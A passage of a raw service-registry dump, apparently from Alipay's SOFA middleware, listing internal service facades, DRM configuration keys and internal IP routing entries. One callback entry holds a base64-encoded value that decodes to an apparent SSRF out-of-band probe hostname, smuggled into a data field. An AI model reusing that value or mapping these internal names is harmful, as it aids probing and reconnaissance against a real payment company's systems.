ofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.dataProdTransWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.PcllSwitchBlackDrm.blackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finquantprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:aliinvoiceprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_obHisDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.0.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.OpenProfileConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:growth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.226.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fporgassetcenter.common.service.facade.api.query.ast.AssetQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.validate.ShopMerchantValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.contract.api.user.CreditUserQueryFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:giftgolding@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_SEC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acnotifycore.common.service.facade.StationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zimtmsvcprod_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.platform.AlipayBoxEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseEnvFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unitestcenter.common.service.facade.api.DatacenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BIZFUND#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.mng.EindustryTestVerifyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.zoneWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.forum.api.ForumQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.34.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dockerlabapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.80.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.shadowHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_AGGRBILLINFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.visiting.CustVisitingLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.common.service.facade.api.MerchantPanelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.stdtrustee.StdTrusteeOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopenmng.service.facade.OfflineFileConfigProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.OpenPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minicreateweb.api.Insight:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.frboss.facade.api.ChartPageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.ExpEventTrackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountcore.common.service.facade.TicketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.TemporaryCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_TEST_BASIC_RATE_LIMIT_RPC-TestBasicRateLimitedStreamServiceDispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:insurance_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfd.connector.service.facade.DataSetQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:iotface.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_PRE_AUTH_PROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbconfigcenter.common.service.facade.api.meta.MetaTableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetAlterationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:umid@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.selection.SelectionFeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mosn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.insmobile.insmobileDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.zy.FaAssetZyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditquery.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.core.service.drm.RateGenerateTaskDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.service.facade.CardRuleMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kborderprod.KopOrderRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.adapterservice.api.AdapterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.writeToExecuteLogDegreeForPay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.common.service.integration.drm.ArrangementBlackListMigrateDrm.migrateWriteArrangementBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:APPEXTRAINFO@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.delivery.InsIopDeliveryMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.McSettleNotifyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.biz.shared.event.handler.EventHandler:1.0:merchandiseDataSyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.sameUidBindedExceedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.loginTid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetInfoByTypeValidateFacade:1.0:mrchasset-qrcode-validator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:findataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.assetlimit.AssetLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.virtualprod.common.service.facade.educate.agentext.EduAgentExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.policy.service.facade.api.DataCollectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointBudgetLibServiceAdapter:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.common.service.component.TerminalIndexComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-F-TRANSDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebillcenter.common.service.facade.EbillTransactionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:gfsettleprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.service.ProviderServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:bkmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:QE16TXdNalE0TmprdExURXdOREF3TXpBeU5nLnNzcmYubm9ibGUubG9nLmx5bm5zaGFyZS5jYw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountSettleWithUniqueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dadeploymentunit.facade.appx.analyse.api.EventChainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.lineage.facade.service.DataLineageStoreService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenDiscussionGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataDistributeService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.tag.facade.TagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:custcenterprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.luckyfish.repo.FinsPrizeInstanceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.mng.serial.pos.PosSerialNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelFeatureCopyConfigResource.compareDetailLogEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:uniqueJobExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.adaptor.fincore.FincoreFluxChangeCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.191.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.common.service.facade.InstructionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbizopt.common.service.facade.revopt.RecommendServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gmodelcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:smartscene@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.jiebeipromo.service.PcreditMarketWinningResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.234.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:finriskmngcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.AppDsApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.meshyserver.common.service.facade.spi.ServiceReleaseQueryFacade:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.risk.api.UserRelieveQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antc.common.service.facade.job.JobManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BizCertifyRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.PushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:fascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditbillcenter.facade.service.sync.BillSyncDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:coveragecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.outservice.rpc.api.ChatMessageRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.LbConn:1.0:NFCC000001@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_EXCASHIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaiminvestprod.common.service.facade.InstitutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquirePayAppliedReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.indicator.IndicatorSnapshotQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.memberday.MemberDayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:autofinanceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.api.item.BFItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.MessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.cdp.SpaceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_ANTFOREST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.224.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.242.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mpaasweb.common.service.facade.replays.LogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PricemngExistingPriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowIntelligentKeywordGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_gfaccenter_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassetpreference.api.facade.StandardizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.CodeValueVagueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mcomment#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.permlimit:name=com.alipay.revol.drm.DowngradeConfig.skipAllForTestStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admgr.common.service.facade.AdMetaSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.CollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskdatacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizinsight.common.service.facade.crowd.AnalysisTableSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.service.CertificateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundguardian.common.facade.service.Ta04VerifyReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.OrderInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.OperationLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.gateway.GatewayJsonService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwsap.common.service.facade.datasource.OdpsTableColService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdConsumePointDrawPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.DataImportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.checkLoanOrgCodeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecbill.common.service.migrate.MigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocKbOrderCloseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.api.InvokeInsuranceCustomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:rmsweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReTechConditionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defininstchannel.common.service.facade.api.execute.InstChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.150.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dcepprod.common.service.facade.api.OpenWalletFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.facade.tenantdispatch.WellChosenServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.MonitorReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.DomainUniqueConstrDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdetail.facade.SuperMembershipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finpwm.finpwmXTradeDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.68.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxnet.common.service.facade.api.FluxTokenRemittanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.RuleTempletFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.authcenter.facade.MobileTerminalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.CommentManagementUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.CertificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.icif#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.arater.common.service.facade.RateRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.MarketingManagementUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.facade.UserConsumeInfoRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.AcpProjectSystemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.util.mapping.EpOneIdMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FRASTRESS#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@pricemng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:record-replay-task-save@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.64.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilebc.common.service.facade.shortlink.ShortLinkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.248.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_CREDIT_LDC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbprod.common.service.facade.promo.service.BankAccRecInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.InstUserInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodswitch.common.service.facade.UnifiedOrderLinkOnLineCheckService:1.0:iposOnLineCheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.biz.api.OliveFundBudgetPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.biz.rpc.api.match.MatchListRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeOldPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.merchantdata.facade.MerchantPaySuccessRateAnalyzeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.trade.HedgeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.PcreditInstSignPermitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openidcore.service.OpenIdCoreClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_K_MERCHANT#@#D